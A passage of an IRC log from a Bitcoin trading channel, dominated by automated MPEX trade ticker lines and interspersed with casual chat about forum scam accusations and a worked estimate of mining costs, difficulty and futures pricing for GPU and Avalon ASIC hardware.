BTC [+] Dec 14 14:13:48 [MPEX] [S.MPOE] 14035 @ 0.00062098 = 8.7155 BTC [-] Dec 14 14:13:49 [MPEX] [S.MPOE] 3365 @ 0.00062258 = 2.095 BTC [+] Dec 14 14:19:24 fwiw: https://bitcointalk.org/index.php?topic=102181.msg1399481#msg1399481 Dec 14 14:19:27 [MPEX] [S.MPOE] 22000 @ 0.00061506 = 13.5313 BTC [-] Dec 14 14:22:37 [MPEX] [S.MPOE] 10363 @ 0.0006066 = 6.2862 BTC [-] Dec 14 14:31:35 [MPEX] [S.MPOE] 2717 @ 0.00060944 = 1.6558 BTC [+] Dec 14 14:31:36 [MPEX] [S.MPOE] 5283 @ 0.00062258 = 3.2891 BTC [+] Dec 14 14:41:10 [MPEX] [S.MPOE] 16829 @ 0.00062258 = 10.4774 BTC [+] Dec 14 14:41:12 [MPEX] [S.MPOE] 3071 @ 0.00062272 = 1.9124 BTC [+] Dec 14 14:49:35 [MPEX] [S.DICE] 2100 @ 0.0032948 = 6.9191 BTC [-] Dec 14 14:51:34 [MPEX] [S.DICE] 1034 @ 0.0032948 = 3.4068 BTC [-] Dec 14 14:51:35 [MPEX] [S.DICE] 1575 @ 0.00328789 = 5.1784 BTC [-] Dec 14 15:00:59 [MPEX] [S.MPOE] 1900 @ 0.0006164 = 1.1712 BTC [-] Dec 14 15:06:13 [MPEX] [S.MPOE] 18000 @ 0.0006164 = 11.0952 BTC [-] Dec 14 15:09:01 [MPEX] [S.MPOE] 17096 @ 0.00061562 = 10.5246 BTC [-] Dec 14 15:09:02 [MPEX] [S.MPOE] 3725 @ 0.00061398 = 2.2871 BTC [-] Dec 14 15:13:27 [MPEX] [S.DICE] 3650 @ 0.00330342 = 12.0575 BTC [+] Dec 14 15:13:28 [MPEX] [S.DICE] 600 @ 0.0033178 = 1.9907 BTC [+] Dec 14 15:20:25 [MPEX] [S.MPOE] 5700 @ 0.00061488 = 3.5048 BTC [+] Dec 14 15:20:27 [MPEX] [S.MPOE] 2169 @ 0.00061398 = 1.3317 BTC [-] Dec 14 15:38:40 [MPEX] [S.MPOE] 30050 @ 0.00060912 = 18.3041 BTC [-] Dec 14 15:41:52 [MPEX] [S.MPOE] 400 @ 0.00060912 = 0.2436 BTC [-] Dec 14 15:41:53 [MPEX] [S.MPOE] 1987 @ 0.0006066 = 1.2053 BTC [-] Dec 14 15:41:55 [MPEX] [S.MPOE] 7313 @ 0.00060564 = 4.429 BTC [-] Dec 14 15:46:02 [MPEX] [S.MPOE] 13187 @ 0.00060564 = 7.9866 BTC [-] Dec 14 15:46:03 [MPEX] [S.MPOE] 5213 @ 0.00060502 = 3.154 BTC [-] Dec 14 15:50:37 [MPEX] [S.MPOE] 9609 @ 0.00060502 = 5.8136 BTC [-] Dec 14 15:50:38 [MPEX] [S.MPOE] 2799 @ 0.00060257 = 1.6866 BTC [-] Dec 14 15:50:39 [MPEX] [S.MPOE] 3692 @ 0.00060213 = 2.2231 BTC [-] Dec 14 15:57:54 [MPEX] [S.MPOE] 14250 @ 0.00060499 = 8.6211 BTC [+] Dec 14 16:02:10 [MPEX] [S.MPOE] 6233 @ 0.00060499 = 3.7709 BTC [+] Dec 14 16:02:11 [MPEX] [S.MPOE] 4667 @ 0.00060286 = 2.8135 BTC [-] Dec 14 16:10:06 [MPEX] [S.MPOE] 1083 @ 0.00060286 = 0.6529 BTC [-] Dec 14 16:10:07 [MPEX] [S.MPOE] 2700 @ 0.00060262 = 1.6271 BTC [-] Dec 14 16:10:09 [MPEX] [S.MPOE] 12408 @ 0.00060213 = 7.4712 BTC [-] Dec 14 16:10:10 [MPEX] [S.MPOE] 4059 @ 0.00060154 = 2.4417 BTC [-] Dec 14 16:14:15 [MPEX] [S.MPOE] 23591 @ 0.00060154 = 14.1909 BTC [-] Dec 14 16:14:17 [MPEX] [S.MPOE] 1909 @ 0.00060111 = 1.1475 BTC [-] Dec 14 16:17:00 [MPEX] [S.MPOE] 17516 @ 0.00060985 = 10.6821 BTC [+] Dec 14 16:28:14 [MPEX] [S.MPOE] 8034 @ 0.00060985 = 4.8995 BTC [+] Dec 14 16:28:16 [MPEX] [S.MPOE] 3210 @ 0.00061054 = 1.9598 BTC [+] Dec 14 16:35:57 [MPEX] [S.MPOE] 4190 @ 0.00061054 = 2.5582 BTC [+] Dec 14 16:35:59 [MPEX] [S.MPOE] 2210 @ 0.00061063 = 1.3495 BTC [+] Dec 14 16:40:00 [MPEX] [S.MPOE] 22400 @ 0.00060922 = 13.6465 BTC [-] Dec 14 16:40:02 [MPEX] [S.MPOE] 6632 @ 0.0006083 = 4.0342 BTC [-] Dec 14 16:48:06 [MPEX] [S.MPOE] 20129 @ 0.00061063 = 12.2914 BTC [+] Dec 14 16:48:07 [MPEX] [S.MPOE] 6422 @ 0.00061262 = 3.9342 BTC [+] Dec 14 16:48:09 [MPEX] [S.MPOE] 291 @ 0.00061602 = 0.1793 BTC [+] Dec 14 16:49:16 [MPEX] [S.MPOE] 12068 @ 0.0006083 = 7.341 BTC [-] Dec 14 17:05:44 [MPEX] [S.MPOE] 4532 @ 0.0006048 = 2.741 BTC [-] Dec 14 17:05:45 [MPEX] [S.MPOE] 16900 @ 0.00060639 = 10.248 BTC [+] Dec 14 17:05:47 [MPEX] [S.MPOE] 9909 @ 0.00061602 = 6.1041 BTC [+] Dec 14 17:13:32 [MPEX] [S.MPOE] 4550 @ 0.0006164 = 2.8046 BTC [+] Dec 14 17:13:34 [MPEX] [S.MPOE] 9329 @ 0.00062272 = 5.8094 BTC [+] Dec 14 17:13:35 [MPEX] [S.MPOE] 13095 @ 0.0006233 = 8.1621 BTC [+] Dec 14 17:30:36 [MPEX] [S.MPOE] 5705 @ 0.0006233 = 3.5559 BTC [+] Dec 14 17:30:37 [MPEX] [S.MPOE] 23000 @ 0.00062351 = 14.3407 BTC [+] Dec 14 17:30:39 [MPEX] [S.MPOE] 18495 @ 0.00062357 = 11.5329 BTC [+] Dec 14 17:37:06 [MPEX] [S.MPOE] 6255 @ 0.00062357 = 3.9004 BTC [+] Dec 14 17:37:08 [MPEX] [S.MPOE] 17745 @ 0.00062422 = 11.0768 BTC [+] Dec 14 17:40:47 [MPEX] [S.MPOE] 22064 @ 0.00062215 = 13.7271 BTC [-] Dec 14 17:42:06 [MPEX] [S.MPOE] 136 @ 0.00062215 = 0.0846 BTC [-] Dec 14 17:42:07 [MPEX] [S.MPOE] 3164 @ 0.00061602 = 1.9491 BTC [-] Dec 14 17:44:20 [MPEX] [S.MPOE] 3850 @ 0.00062422 = 2.4032 BTC [+] Dec 14 17:57:32 [MPEX] [S.MPOE] 5705 @ 0.00062422 = 3.5612 BTC [+] Dec 14 17:57:33 [MPEX] [S.MPOE] 1745 @ 0.00062706 = 1.0942 BTC [+] Dec 14 18:08:10 [MPEX] [S.MPOE] 9878 @ 0.00061602 = 6.085 BTC [-] Dec 14 18:08:12 [MPEX] [S.MPOE] 4525 @ 0.00061368 = 2.7769 BTC [-] Dec 14 18:10:45 [MPEX] [S.MPOE] 10293 @ 0.00061015 = 6.2803 BTC [-] Dec 14 18:10:46 [MPEX] [S.MPOE] 15884 @ 0.00062706 = 9.9602 BTC [+] Dec 14 18:16:51 [MPEX] [S.MPOE] 22075 @ 0.00060319 = 13.3154 BTC [-] Dec 14 18:16:52 [MPEX] [S.MPOE] 10900 @ 0.00060316 = 6.5744 BTC [-] Dec 14 18:16:53 [MPEX] [S.MPOE] 9319 @ 0.00060111 = 5.6017 BTC [-] Dec 14 18:16:54 [MPEX] [S.MPOE] 4396 @ 0.00060093 = 2.6417 BTC [-] Dec 14 18:32:17 [MPEX] [S.DICE] 558 @ 0.0033178 = 1.8513 BTC [+] Dec 14 18:40:42 [MPEX] [S.MPOE] 8600 @ 0.00061934 = 5.3263 BTC [+] Dec 14 18:40:43 [MPEX] [S.MPOE] 8500 @ 0.00061967 = 5.2672 BTC [+] Dec 14 18:40:45 [MPEX] [S.MPOE] 3300 @ 0.00062706 = 2.0693 BTC [+] Dec 14 19:04:17 [MPEX] [S.MPOE] 13800 @ 0.00061154 = 8.4393 BTC [-] Dec 14 19:04:18 [MPEX] [S.MPOE] 15700 @ 0.00060802 = 9.5459 BTC [-] Dec 14 19:04:20 [MPEX] [S.MPOE] 20100 @ 0.00060556 = 12.1718 BTC [-] Dec 14 19:04:21 [MPEX] [S.MPOE] 13129 @ 0.00060489 = 7.9416 BTC [-] Dec 14 19:08:11 [MPEX] [S.DICE] 1600 @ 0.0034 = 5.44 BTC [+] Dec 14 19:17:13 [MPEX] [S.MPOE] 8400 @ 0.00060635 = 5.0933 BTC [+] Dec 14 19:39:02 [MPEX] [S.MPOE] 10000 @ 0.00061634 = 6.1634 BTC [+] Dec 14 19:46:17 [MPEX] [S.MPOE] 5000 @ 0.00061634 = 3.0817 BTC [+] Dec 14 19:46:18 [MPEX] [S.MPOE] 2800 @ 0.00060635 = 1.6978 BTC [-] Dec 14 19:46:19 [MPEX] [S.MPOE] 6621 @ 0.00060489 = 4.005 BTC [-] Dec 14 19:46:21 [MPEX] [S.MPOE] 11311 @ 0.00060459 = 6.8385 BTC [-] Dec 14 19:46:21 [MPEX] [S.MPOE] 1345 @ 0.00060318 = 0.8113 BTC [-] Dec 14 19:50:51 sooo what's up today Dec 14 19:52:49 [MPEX] [S.MPOE] 11250 @ 0.00060318 = 6.7858 BTC [-] Dec 14 19:53:08 i'm starting to think the scam accusations section of the forums is getting over used Dec 14 19:53:30 but what do i know.. Dec 14 19:53:45 who now ? Dec 14 19:53:52 i recall piuk getting hit for $6. Dec 14 19:57:35 [MPEX] [S.MPOE] 9622 @ 0.00060318 = 5.8038 BTC [-] Dec 14 19:59:00 I think you are right gigavps Dec 14 19:59:16 [MPEX] [S.MPOE] 15150 @ 0.00061767 = 9.3577 BTC [+] Dec 14 20:07:43 [MPEX] [S.MPOE] 11600 @ 0.00062226 = 7.2182 BTC [+] Dec 14 20:18:05 [MPEX] [S.MPOE] 1600 @ 0.00062226 = 0.9956 BTC [+] Dec 14 20:18:07 [MPEX] [S.MPOE] 16050 @ 0.00061724 = 9.9067 BTC [-] Dec 14 20:18:08 [MPEX] [S.MPOE] 4383 @ 0.00060318 = 2.6437 BTC [-] Dec 14 20:18:09 [MPEX] [S.MPOE] 4340 @ 0.00060225 = 2.6138 BTC [-] Dec 14 20:19:12 yeah, right. Dec 14 20:22:17 [MPEX] [S.MPOE] 16350 @ 0.00060225 = 9.8468 BTC [-] Dec 14 20:25:24 the bfl thing is beyond incredible. Dec 14 20:25:29 i have never heard of such a thing. Dec 14 20:26:15 in other news : SD Profit before fees: 30628.62760334 BTC (2.055%) Dec 14 20:26:25 holy shit they're going to post +14k at this rate. Dec 14 20:27:09 http://www.rollingstone.com/politics/blogs/taibblog/outrageous-hsbc-settlement-proves-the-drug-war-is-a-joke-20121213 Dec 14 20:27:26 link me to this new bfl drama Dec 14 20:27:33 don't make me read up in the buffer Dec 14 20:27:49 jcpham 1 second Dec 14 20:27:53 let the girl post first. Dec 14 20:29:26 https://bitcointalk.org/index.php?topic=89902.0 Dec 14 20:29:28 that one? Dec 14 20:32:18 nah Dec 14 20:32:49 [MPEX] [S.MPOE] 5200 @ 0.00061881 = 3.2178 BTC [+] Dec 14 20:34:51 [MPEX] [S.MPOE] 10210 @ 0.00060225 = 6.149 BTC [-] Dec 14 20:34:53 [MPEX] [S.MPOE] 4054 @ 0.00060093 = 2.4362 BTC [-] Dec 14 20:34:54 [MPEX] [S.MPOE] 2636 @ 0.00060054 = 1.583 BTC [-] Dec 14 20:36:10 jcpham https://bitcointalk.org/index.php?topic=129566.msg1400034#msg1400034 Dec 14 20:37:48 i tried to read it but I was staring at her avatar the whole time Dec 14 20:39:17 [MPEX] [S.MPOE] 3351 @ 0.00060054 = 2.0124 BTC [-] Dec 14 20:39:41 good plan. Dec 14 20:47:46 mircea_popescu: see comment Dec 14 20:48:51 and I typo'd "If" into "I" :( Dec 14 20:53:08 [MPEX] [S.MPOE] 10414 @ 0.00060775 = 6.3291 BTC [+] Dec 14 20:53:09 Ya know, If I really had confidence in that formula, I would sell a crapload of futures based on the projected costs of a farm and equipment and use the btc to buy a farm and equipment Dec 14 20:53:43 to quote the owl, "let's find out" Dec 14 20:53:53 smickles: heh Dec 14 20:54:01 using a single BFL product as an example Dec 14 20:54:06 smickles: well Dec 14 20:54:10 if I wanted to be a fucking dick Dec 14 20:54:26 I'd sell futures and then take the money and buy lots of mining hardware Dec 14 20:54:26 oh? Dec 14 20:54:36 and then no matter what happens, I end up with lots of cash Dec 14 20:54:42 how's that being a dick? Dec 14 20:55:02 if you sell at the right price, that is a good move Dec 14 20:55:13 I dunno Dec 14 20:55:26 Im trying to figure out how to turn other peoples money into my money without betting Dec 14 20:55:40 Diablo-D3: i'm talking about this formula: I believe that any sufficiently large miner can make relatively safe profits by selling these contracts in an amount derived by the following formula: Dec 14 20:55:44 ([easiest difficulty shares per minute] * ([current block reward] / [current difficulty])) * [minutes until settlement] * 2 Dec 14 20:55:47 They should sell at a price per contract greater than the projected expenses for the time period divided by the number of contracts. Dec 14 20:55:50 The amount received in excess of projected expenses should be risk free profit. Which, btw, is received in advance of the work being done. Which enables the miner to buy more equipment and repeat the process. Dec 14 20:56:04 smickles: _huh_ Dec 14 20:56:11 smickles: so do me a favor Dec 14 20:56:15 Diablo-D3: that formula might work for you, if you know shares per minute and projected costs Dec 14 20:56:15 plug the current numbers into that Dec 14 20:56:19 I have Dec 14 20:56:24 whats the number Dec 14 20:56:33 [MPEX] [S.MPOE] 1286 @ 0.00060775 = 0.7816 BTC [+] Dec 14 20:56:34 [MPEX] [S.MPOE] 1300 @ 0.00060716 = 0.7893 BTC [-] Dec 14 20:56:36 [MPEX] [S.MPOE] 4703 @ 0.00060054 = 2.8243 BTC [-] Dec 14 20:56:43 well, what's a good number for cost per Gh? Dec 14 20:56:52 (per month) Dec 14 20:56:53 hrm, well Dec 14 20:56:59 per month? what, electricity or what? Dec 14 20:57:12 electricity and proportional equipment cost Dec 14 20:57:25 okay, so we're working with a 2 year pay off number or what? Dec 14 20:57:40 based on a 5970 and the internet i came up with .3 btc per Gh per month Dec 14 20:57:53 how does that sound? Dec 14 20:58:10 on 5xxx or 69xx or 7xxx thats roughly, eh Dec 14 20:58:17 a 2yr payoff is ideas, as that would equate to tax depreciation Dec 14 20:58:21 *ideal Dec 14 20:58:29 like, my 7970 does 675 mhash overclocked Dec 14 20:59:15 thanks smickles Dec 14 20:59:34 [01:59:09] The expected generation output, at 675.0 Mhps, given difficulty of 3370181.79928, is 0.100726636919 BTC per day and 0.00419694320496 BTC per hour. Dec 14 21:00:15 anyway, if my estimate is near enough to correct, the formula says that a miner with 30Gh/s and .3btc/Gh/month costs would break even selling 54 contracts at 0.03322320 btc each Dec 14 21:00:40 smickles: lets say $380 for the 7970, btw Dec 14 21:00:46 Diablo-D3: so they should probably sell at .034 or .035ish Dec 14 21:01:26 Diablo-D3: let me help you get into the proper mindset, it's not 380 USD it's 27.5 btc Dec 14 21:01:44 [MPEX] [S.MPOE] 11110 @ 0.00060054 = 6.672 BTC [-] Dec 14 21:01:45 [MPEX] [S.MPOE] 5452 @ 0.00060027 = 3.2727 BTC [-] Dec 14 21:02:02 so 4.444~ btc per 30 day month per 1gh, $562.96 per 1gh Dec 14 21:02:08 !ticker Dec 14 21:02:08 Provide ticker. Dec 14 21:02:12 er Dec 14 21:02:13 ;ticker Dec 14 21:02:22 lol Dec 14 21:02:27 fucking gribble Dec 14 21:02:42 [02:02:17] BTCUSD ticker | Best bid: 13.50006, Best ask: 13.60400, Bid-ask spread: 0.10394, Last trade: 13.50005, 24 hour volume: 51438.51375095, 24 hour low: 13.31012, 24 hour high: 13.90119, 24 hour vwap: 13.69112 Dec 14 21:02:45 Diablo-D3: 27.5 btc is your cost per Gh per month? Dec 14 21:03:08 smickles: no, to buy Dec 14 21:03:35 4.444~ btc generated per 30 day month per 1gh, 41.7 btc per 1gh to buy Dec 14 21:03:41 and electricity is eh Dec 14 21:04:01 that's about 1.14/month equipment costs Dec 14 21:04:22 gotta figure out the power usage Dec 14 21:04:35 and btw, that doesnt include the cost of the rigs Dec 14 21:04:42 so theres going to be a cost per 7 of those Dec 14 21:04:51 plus an additional 50 watts Dec 14 21:05:20 so lets say 300 watts per overclocked 7970 Dec 14 21:05:42 or 444.444~ watts per 1gh Dec 14 21:06:20 or 0.0533328 cents per 1gh per hour Dec 14 21:06:36 you want btc/month Dec 14 21:06:41 or $38.3999616 per 30 day month Dec 14 21:07:00 or 2.84 btc per month per 1gh Dec 14 21:07:33 crap mircea_popescu I forgot to specify that I was talkign about the idiff.dec Dec 14 21:08:01 lol so add Dec 14 21:08:02 [MPEX] [S.MPOE] 14500 @ 0.00060871 = 8.8263 BTC [+] Dec 14 21:08:03 [MPEX] [S.MPOE] 3250 @ 0.00061129 = 1.9867 BTC [+] Dec 14 21:08:13 smickles: so.... Dec 14 21:08:30 one sec D Dec 14 21:08:31 41.7 / 24 = 1.74, then 2.84 per month in power usage Dec 14 21:08:31 seems my 1btc/gh/month was under smickles. not .3 but 3. Dec 14 21:08:50 Diablo-D3 does it even make it back, the 2.84 ? Dec 14 21:08:59 mircea_popescu: well Dec 14 21:09:00 no. Dec 14 21:09:11 1.74 + 4.58 = 4.58 Dec 14 21:09:55 ack, well, the high price certainly fits the volatility Dec 14 21:10:06 well, remember, this is with gpus Dec 14 21:10:14 and remember, the price is even worse Dec 14 21:10:16 also, who's going to buy a 79XX now Dec 14 21:10:34 you're looking at roughly $200 per 7 of those plus another 50 watts Dec 14 21:10:41 actually, lets just say $250 Dec 14 21:10:44 smickles: but yeah Dec 14 21:10:45 now Dec 14 21:10:47 lets do asics Dec 14 21:10:50 and not bfl ones Dec 14 21:12:02 lets take avalon Dec 14 21:12:18 66gh, 400w, $1300 Dec 14 21:12:56 so 1.45 btc per gh, 6.06 watt per gh Dec 14 21:13:14 0.06 btc per gh per month over 2 years Dec 14 21:14:06 and, is that 838 shares per minute? Dec 14 21:14:07 0.039 btc per month electricity Dec 14 21:14:31 [MPEX] [S.MPOE] 13750 @ 0.00061129 = 8.4052 BTC [+] Dec 14 21:14:33 [MPEX] [S.MPOE] 5318 @ 0.0006129 = 3.2594 BTC [+] Dec 14 21:14:37 smickles: hrm, what kind of shares? diff 1 shares? Dec 14 21:15:07 so 0.099 btc per gh. Dec 14 21:15:21 yeah, diff 1 shares Dec 14 21:15:22 per month, operating costs Dec 14 21:15:24 smickles: well Dec 14 21:15:26 that math is constant Dec 14 21:16:26 it takes 4.295 seconds to go through the entire 2**32 space Dec 14 21:16:40 there is, on average, 1 diff 1 share per 2**32 Dec 14 21:17:48 so you pay 0.099 btc per month to get 603492 shares. Dec 14 21:18:00 smickle Dec 14 21:18:08 so that's 257 shares per minute then? Dec 14 21:18:17 sir smickles the bitoin certified accountant, i have idea for you Dec 14 21:18:21 premise for my thing Dec 14 21:18:33 smickles: erm dude, 60 / 4.295 = 14 Dec 14 21:18:47 ;;calc 60/4.295 Dec 14 21:18:48 13.9697322468 Dec 14 21:18:56 [MPEX] [S.MPOE] 2282 @ 0.0006129 = 1.3986 BTC [+] Dec 14 21:18:57 [MPEX] [S.MPOE] 11818 @ 0.00061899 = 7.3152 BTC [+] Dec 14 21:18:59 oh what did i do then? Dec 14 21:19:06 I dont know. Dec 14 21:19:09 3GH/s is ~40-43 shares per minute Dec 14 21:19:11 input error Dec 14 21:19:14 dunno about asic Dec 14 21:19:20 jcpham: no Dec 14 21:19:23 it has nothing to do with hardware Dec 14 21:19:27 thestringpuller: Oh? Dec 14 21:19:29 you get 1 share per 2**32 hashes Dec 14 21:19:36 http://mpex.co/ << Dec 14 21:19:42 yessir. I see you are busy with the people from blizzard Dec 14 21:20:01 2**32 / 1000000000 = seconds it takes at 1gh to deplete the range Dec 14 21:20:02 well my equipment has done 40-43 shares/minute Dec 14 21:20:06 for 18 months Dec 14 21:20:10 @ 3GH/s Dec 14 21:20:16 jcpham: no, Im saying, it has nothing to do with hardware Dec 14 21:20:26 mircea_popescu: so it turns out my assumptions were way off Dec 14 21:20:34 aha ? Dec 14 21:20:38 jcpham: and 14 * 3 = 42. Dec 14 21:20:45 jcpham: so you're right in the right range Dec 14 21:20:49 41.31 according to my stats Dec 14 21:20:54 mircea_popescu: or Diablo-D3 facts are way off Dec 14 21:21:00 i doubt that lol Dec 14 21:21:02 smickles: I wrote a miner ;) Dec 14 21:21:12 you can check my math though Dec 14 21:21:18 i understand what you are saying Diablo-D3 Dec 14 21:21:20 heh, (my last statement was humor ;) Dec 14 21:21:43 ;;calc 1300 / 66 / 13.50 Dec 14 21:21:43 1.45903479237 Dec 14 21:21:47 I cannot wait until this asic shit materializes Dec 14 21:21:51 or should i say Dec 14 21:21:52 ;;calc 1300 / 66 / 13.50 / 24 Dec 14 21:21:52 0.0607931163487 Dec 14 21:21:55 ;;later tell namjies mpex.co Dec 14 21:21:56 The operation succeeded. Dec 14 21:21:57 [MPEX] [S.MPOE] 1382 @ 0.00061899 = 0.8554 BTC [+] Dec 14 21:22:07 that many btc per month for 2 years per gh Dec 14 21:22:11 hey, how come cgminer tell me that i get 3 shares per minute on 200Mh/s? Dec 14 21:22:34 200 MH/s might be 3 shares/min Dec 14 21:22:40 stales Dec 14 21:22:54 depends on where you are submitting shares Dec 14 21:23:06 and whether they are all accepted or not Dec 14 21:24:02 smickles: 1000mh / 200 = 5, 4.295 * 5 = 21.475 seconds Dec 14 21:24:24 or roughly 2.79 shares per minute Dec 14 21:24:38 so it seems to be right Dec 14 21:24:45 anyhow, back to my math Dec 14 21:25:08 ;;calc 400 / 66 Dec 14 21:25:08 6.06060606061 Dec 14 21:25:18 that many watts per gh Dec 14 21:25:30 coinlab pps is still keeping me paid Dec 14 21:25:39 and 60 Gh/s is only 14 shares per minute? Dec 14 21:25:43 ;;calc 0.12 / 1000 * 6.06060606061 / 13.50 * 24 * 30 Dec 14 21:25:43 0.0387878787879 Dec 14 21:25:48 better than diff/block reward Dec 14 21:25:51 that's for sure Dec 14 21:26:08 that many btc per month for electricity per gh Dec 14 21:26:27 ;;calc 0.0387878787879 + 0.0607931163487 Dec 14 21:26:27 0.0995809951366 Dec 14 21:26:45 total cost of ownership over 24 month period. Dec 14 21:26:48 per month. Dec 14 21:27:07 ok, Diablo-D3 tell me straight, how many diff 1 shares per minute does 66 Gh/s expect to produce? Dec 14 21:27:33 smickles: well, if 1gh does 14 per minute, its 14 * 66 Dec 14 21:27:36 [MPEX] [S.MPOE] 3518 @ 0.00061983 = 2.1806 BTC [+] Dec 14 21:27:58 i agree with what Diablo-D3 said. armchair math Dec 14 21:28:29 ;;calc 14*66 Dec 14 21:28:29 924 Dec 14 21:28:56 [02:28:11] The expected generation output, at 1000.0 Mhps, given difficulty of 3370181.79928, is 0.149224647288 BTC per day and 0.00621769363698 BTC per hour. Dec 14 21:28:56 ;;calc 25/[bc,diff] Dec 14 21:28:57 7.41799745205e-06 Dec 14 21:29:13 Diablo-D3: and the cost per Gh per month you figured? Dec 14 21:29:18 ;;calc 924*.00000741 Dec 14 21:29:19 0.00684684 Dec 14 21:29:25 ;;calc 0.149224647288 * 30 Dec 14 21:29:25 4.47673941864 Dec 14 21:29:45 ;;calc 4.47673941864 - 0.0995809951366 Dec 14 21:29:45 4.3771584235 Dec 14 21:29:50 thats your profit per month per gh Dec 14 21:30:06 ok, profit less revenue :P Dec 14 21:30:24 smickles: hrm? Dec 14 21:30:58 btw, I did that math using 12 cents per kwh Dec 14 21:31:05 you'll have to substitute your own in for serious math Dec 14 21:31:19 Still no one in here willing to lend me 100 BTC I presume? Dec 14 21:31:19 US depending on where you live is usually between 8 and 12 for residential Dec 14 21:32:03 now lets say diff increases 100x Dec 14 21:32:38 you'll still be making 0.4476 per month and paying out 0.099 per month Dec 14 21:32:54 er that was 10x Dec 14 21:32:57 hrm Dec 14 21:33:02 if diff increases 100x, you're fucked Dec 14 21:33:42 Diablo-D3: the idea is to factor out the diff changes Dec 14 21:33:52 ;;calc 4.47673941864 / 0.0995809951366 Dec 14 21:33:52 44.9557610114 Dec 14 21:33:56 smickles tbh i always thought miner wants to buy diff nto sell it. Dec 14 21:34:07 diff cant increase more than that in the first 24 months Dec 14 21:34:37 i have at least 6 weeks of 0.00012427 US DOLLARS PER SHARE left at coinlab Dec 14 21:34:43 maybe asic will be here by then Dec 14 21:34:57 ;;calc 4.47673941864 / 0.0387878787879 Dec 14 21:34:57 115.415938137 Dec 14 21:35:07 diff cant increase that after 24 months Dec 14 21:35:39 [MPEX] [S.MPOE] 10300 @ 0.00060837 = 6.2662 BTC [-] Dec 14 21:35:40 smickles: so how much would you be selling the futures for? Dec 14 21:36:07 4.377 * 2 per gh? Dec 14 21:37:14 smickles: anyhow, I did the hard part of the math for you I think Dec 14 21:37:42 diff can't go above 115x what it is now with btc at 13.50 Dec 14 21:38:11 Diablo-D3 you sure? Dec 14 21:38:27 gigavps: this is a profit calculation Dec 14 21:38:36 i think my asic purchase is only profitable for me up to a 30x diff increase Dec 14 21:38:41 after 30x i'm fucked Dec 14 21:38:55 gigavps: with 12 cents a kwh power, and avalon units using 400 watts for 66gh, and btc at $13.50 Dec 14 21:38:58 so a diff of 90 mil would end my mining Dec 14 21:39:00 gigavps: 115x is fatal Dec 14 21:39:10 who cares Dec 14 21:39:13 i'll mine Dec 14 21:39:18 i'm married to bitcoin Dec 14 21:39:22 hahaha Dec 14 21:39:24 I think you missed the point. Dec 14 21:39:33 ;;diff Dec 14 21:39:33 3370181.799277837 Dec 14 21:39:36 i just said i don't care Dec 14 21:39:40 diff is dropping Dec 14 21:39:44 no one is delivering asics Dec 14 21:39:45 yeah it is Dec 14 21:39:46 3.37 million diff Dec 14 21:40:00 ;;bc,estimate Dec 14 21:40:00 3043795.00466468 Dec 14 21:40:01 predictinator says diff is going down down down Dec 14 21:40:04 until asic exists Dec 14 21:40:09 ;;bc,diffchange Dec 14 21:40:10 Estimated percent change in difficulty this period | -9.6845456433 % based on data since last change | -15.4954531067 % based on data for last three days Dec 14 21:40:15 so we'd need roughly 388 million diff for avalon to become unprofitable Dec 14 21:40:24 jeez Dec 14 21:41:26 I think I scared smickles Dec 14 21:41:33 Diablo-D3: so you said that the cost of equipment and elec. per month per gh was ~.09958? Dec 14 21:42:01 [02:25:27] ;;calc 0.12 / 1000 * 6.06060606061 / 13.50 * 24 * 30 Dec 14 21:42:02 [02:25:27] 0.0387878787879 Dec 14 21:42:08 [02:26:11] ;;calc 0.0387878787879 + 0.0607931163487 Dec 14 21:42:08 [02:26:11] 0.0995809951366 Dec 14 21:42:11 yes. Dec 14 21:42:24 oh and Dec 14 21:42:27 [02:21:36] ;;calc 1300 / 66 / 13.50 / 24 Dec 14 21:42:27 [02:21:37] 0.0607931163487 Dec 14 21:42:45 [MPEX] [S.DICE] 2702 @ 0.00339777 = 9.1808 BTC [-] Dec 14 21:42:52 pretty sure I did the math right Dec 14 21:42:55 smickles if you need a partner to operate mining equipment for you... Dec 14 21:43:22 dollars per kwh to watt hour times 6.06 watts convert to btc convert to day convert to month Dec 14 21:43:36 oh and Dec 14 21:43:45 smickles let's create a mining asset and take the bitcoins! Dec 14 21:43:46 [02:24:52] ;;calc 400 / 66 Dec 14 21:43:46 [02:24:52] 6.06060606061 Dec 14 21:43:55 smickles: so thats all the math. Dec 14 21:44:19 smickles: 1300, 66, and 400 are dollars, gh, and watts from the vendor per unit Dec 14 21:44:40 smickles: 0.12 is dollars per kwh Dec 14 21:44:55 smickles: so you should be able to script that easily Dec 14 21:48:37 i need to research futures a bit more :o Dec 14 21:50:18 mining future Dec 14 21:50:19 s Dec 14 21:50:52 ha ha I scared smickles Dec 14 21:51:04 smickles: wait, what was the last you saw? Dec 14 21:51:08 [MPEX] [S.MPOE] 7350 @ 0.00061517 = 4.5215 BTC [+] Dec 14 21:51:26 Diablo-D3: it's not about your numbers, it's about my formula, the delta of diff futures etc Dec 14 21:52:21 *delta of diff futures atm Dec 14 21:53:59 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.60781728 = 607.8173 BTC [-] Dec 14 21:54:15 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.52540165 = 525.4017 BTC [-] Dec 14 21:55:33 smickles: ahh Dec 14 21:55:34 see Dec 14 21:55:38 I'd rather go for worst case Dec 14 21:55:51 whats the chances of diff increasing 115x from right now Dec 14 21:57:21 [MPEX] [S.MPOE] 6500 @ 0.00060837 = 3.9544 BTC [-] Dec 14 21:57:22 [MPEX] [S.MPOE] 19650 @ 0.00060491 = 11.8865 BTC [-] Dec 14 21:57:57 abracadabra looks to buy more gpus <<< prolly a safer investment Dec 14 21:58:00 at least they can be sold Dec 14 21:58:53 gpu mining is profitable if you have free power and enough time Dec 14 21:59:07 that time variable just got bigger though Dec 14 21:59:10 yeah, if you have free power, you can just get unlimited gpus Dec 14 21:59:16 [MPEX] [O.BTCUSD.C140T] 90 @ 0.08471093 = 7.624 BTC [-] Dec 14 21:59:24 ;;ticker Dec 14 21:59:25 BTCUSD ticker | Best bid: 13.34640, Best ask: 13.34641, Bid-ask spread: 0.00001, Last trade: 13.34640, 24 hour volume: 63684.39592991, 24 hour low: 13.00000, 24 hour high: 13.90119, 24 hour vwap: 13.59704 Dec 14 21:59:31 we just lost half a cent Dec 14 21:59:34 dolla Dec 14 21:59:38 down she goes Dec 14 22:00:02 i was like, wtf are ppl buying puts Dec 14 22:00:10 [MPEX] [S.MPOE] 6232 @ 0.00061517 = 3.8337 BTC [+] Dec 14 22:00:11 [MPEX] [S.MPOE] 19054 @ 0.00061572 = 11.7319 BTC [+] Dec 14 22:00:33 mircea_popescu: did i not chat with you about this happening? Dec 14 